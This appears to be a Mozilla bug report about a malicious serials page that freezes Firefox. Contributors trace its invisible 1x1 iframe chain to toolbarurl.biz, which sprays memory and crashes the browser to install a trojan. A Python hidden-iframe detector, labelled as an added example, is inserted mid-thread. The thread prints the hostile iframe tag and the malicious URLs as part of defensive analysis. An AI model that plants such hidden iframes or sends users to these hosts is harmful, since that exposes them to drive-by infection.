Closed
Bug 320348
Opened 19 years ago
Closed 19 years ago
browser freezes because of an illegal script
Categories
(Core :: Security, defect)
RESOLVED
DUPLICATE
of bug 317334
People
(Reporter: fignamoya, Assigned: dveditz)
Details
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5

Browser freezes due to an illegal script on a page. This, in turn, causes all Firefox windows to close.

Reproducible: Always

Steps to Reproduce:
1. Go to http://www.serials.ws/all/?l=v&pn=3
2. Ctrl+F and search 1301 on the page (javascript link to visual assist x... 1301)
3. Click on the link and observe how the browser runs CPU usage to 100%
Updated•19 years ago
Component: General → Layout
Product: Firefox → Core
QA Contact: general → layout
Version: 1.5 Branch → 1.8 Branch
Comment 1•19 years ago
Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9a1) Gecko/20051215 Firefox/1.6a1 ID:2005121500

I see this too.

In addition, this appears to disable the block popups option in the browser.
Component: Layout → JavaScript Engine
Comment 3•19 years ago
view-source:http://www.serials.ws/all/?l=v&pn=3
<a href=javascript:d(170307)>Visual Assist X 10.1.1301</a> :: 2005-04-30

http://www.serials.ws/serws.js
function d(id){
  window.open('/d.php?n='+id,'Operate','toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,width=650,height=550');
}

view-source:http://www.serials.ws/d.php?170307
this page contains an iframe:
<iframe src="http://toolbarurl.biz/dl/adv661.php" width=1 height=1></iframe>

the iframe loads:
view-source:http://toolbarurl.biz/dl/adv661.php
this in turn loads 8 iframes:
view-source:http://toolbarurl.biz/dl/fillmemadv661.htm
and 1 iframe:
view-source:http://toolbarurl.biz/dl/bag.htm
Comment 4•19 years ago
Seen with the view-source: prefixed, the URLs in comment 3 are harmless.

view-source:http://toolbarurl.biz/dl/fillmemadv661.htm
fills the memory with 100000 times a return address, and then a short piece of code, 586 words. Memory is filled by 8 iframes of this type, and the bag.html seems to be used to produce a crash, hopefully landing in one of those long regions leading to the exploit code.

Google search for ADV661 shows it is a trojan:
http://sandbox.norman.no/live_2.html?logfile=437547
http://www.sophos.com/virusinfo/analyses/trojdownldrdl.html

If you've been on the site, read the reports to check if you are infected. I don't want to try going to this site with JS enabled.

I'm setting component to Security, so dveditz@cruzio.com can look if we are in danger, or if it's just a hang.
Assignee: nobody → dveditz
Status: UNCONFIRMED → NEW
Component: JavaScript Engine → Security
Ever confirmed: true
QA Contact: layout → toolkit
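The iframe chain traced by hand in comment 3 (a 1x1 iframe to another host, fanning out into further iframes) can be recovered mechanically from saved page source. The following is an added example, not part of the original bug thread; the function names, the 2-pixel threshold and the placeholder hosts are assumptions, and the sample pages are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

MAX_PX = 2  # assumption: a frame this small is invisible to the user

class IframeCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.frames = []
    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.frames.append(dict(attrs))

def px(value):
    # Pixel count from a width/height attribute, or None ("100%", missing).
    try:
        return int((value or "").strip().lower().replace("px", ""))
    except ValueError:
        return None

def hidden_iframes(html, page_url):
    # (absolute src, cross_host) for every tiny iframe in the document.
    collector = IframeCollector()
    collector.feed(html)
    found = []
    for a in collector.frames:
        w, h = px(a.get("width")), px(a.get("height"))
        if a.get("src") and None not in (w, h) and max(w, h) <= MAX_PX:
            src = urljoin(page_url, a["src"])
            found.append((src, urlparse(src).hostname != urlparse(page_url).hostname))
    return found

def walk_chain(pages, url, depth=0, seen=None):
    # Follow hidden iframes through pages (url -> saved html); nothing is fetched.
    seen = set() if seen is None else seen
    if url in seen or url not in pages:
        return []
    seen.add(url)
    report = []
    for src, cross in hidden_iframes(pages[url], url):
        report.append((depth, url, src, cross))
        report.extend(walk_chain(pages, src, depth + 1, seen))
    return report

FRAME = '<iframe src="%s" width=1 height=1></iframe>'
SAMPLE = {  # constructed pages shaped like comment 3's chain; hosts are placeholders
    "http://site.example/d.php?n=1": FRAME % "http://ads.example/dl/a.php",
    "http://ads.example/dl/a.php": (FRAME % "fill.htm") * 8 + FRAME % "bag.htm",
}
```

Each tuple returned by `walk_chain` is (depth, parent page, iframe URL, cross-host flag), so a cross-host hidden frame at depth 0 followed by a burst of identical frames at depth 1 stands out in the report.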
Comment 5•19 years ago
Similar scripts used in
Bug 320760 Browser hangs at 100% CPU following document.write by malicious javascript
Bug 317334 hang when long wrappable string is passed to prompt() [e.g. as used in the exploit for IE's <body onload=window()> bug]

*** This bug has been marked as a duplicate of 317334 ***
Status: NEW → RESOLVED
Closed: 19 years ago
Resolution: --- → DUPLICATE